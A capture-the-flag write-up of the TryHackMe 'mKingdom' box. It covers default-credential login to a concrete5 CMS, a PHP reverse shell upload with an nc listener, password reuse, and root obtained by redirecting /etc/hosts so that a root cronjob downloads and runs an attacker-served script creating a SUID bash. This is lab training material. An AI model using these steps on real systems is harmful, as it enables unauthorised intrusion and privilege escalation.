mKingdom Writeup: Tryhackme

Beginner-friendly box inspired by a certain mustache man.

·

3 min read

Box Summary

The mKingdom room was an easy rated machine created by uartao. The machine involved around finding a concrete cms instance where we get in as admin and then get foothold as www-data using a webshell. and then privilege escalation to another user and then root.

Enumeration

As Always started enumerating the box with nmap for open ports and found just one open port - 85.

port 85 was a webapp with a default banner, using ffuf with common.txt, we find the /app endpoint where a concrete5 cms instance is hosted.

From the footer we see the login link, trying default credentials such as admin:admin, admin:password, we find that admin:password is the right credential and get in as admin.

from the files endpoint (from right navbox) we can upload files to the instance. but only images are allowed. This can either be bypassed easily or we can go to System & Settings > Allowed Filetypes and add the 'php' extension.

GO back to Files, I will be uploading a php reverse shell, from here. Make sure you change the $ip and $port variables to your IP and listening port.

Upload the reverse shell using the upload file feature.

Start a netcat listener on the port you specified in the reverse shell:

nc -lvnp <port>

Use the File Link to access it.

And if we get a shell as www-data.

Privilege Escalation (to Toad):

Now as www-data, we need to find a way to escalate to toad user. checking the web directory in /var/www/html/app/castle/application/config we find the database.php file. which contains the password for mysql for the toad user.

Now Instead of checking mysql (I checked it later, nothing useful there) The password is being reused by toad user. and we get in as toad.

Privilege Escalation (to Mario):

I spent some time in this, although it was something really easy. Checking environment variables (env) we find a base64 encoded value in PWD_token variable.

The Solution was that the decoded PWD_Token is the password for mario user. But I felt like it was too guessy and i was lucky to try and find this. This part could've been a lot better.

We get in as Mario user with the decoded password.

Privilege Escalation (to Root):

Checking the sudo permissions with the command sudo -l, we can find that we can run /usr/bin/id as root. we cannot spawn a shell or anything with id, but interestingly we have the pwfeedback variable enabled in sudo. This seemed like the obvious thing to exploit and become root, but i could not exploit it.

I ran pspy64 to check for running cronjobs by root in the background. and found a job:

Root is running a cronjob that makes a curl request to download counter.sh file from mkingdom.thm:85/ and then execute that to store its output in a log.

The first thing i thought of was, if we can write to hosts file (/etc/hosts) and then change the mkingom.thm ip address to ours, we can control what counter.sh is.

So I checked and Hosts file was indeed part of mario's group, that means we can write to it.

Edited the hosts file to change the localhost (127.0.0.1) to my IP address.

and started a webserver in port 85 with the directory structure of the curl request url.

Counter.sh:

#!/bin/bash

cp /bin/bash /tmp/rootbash

# set suid bit
chmod +s /tmp/rootbash

Make sure you start the webserver from the same directory as the counter.sh file. (The above image is not, and its wrong)

Now after a few seconds, i get a request from the box for counter.sh and it executes the counter.sh, in /tmp the rootbash binary was present.

Get root shell:

/tmp/rootbash -p

Got a shell as root!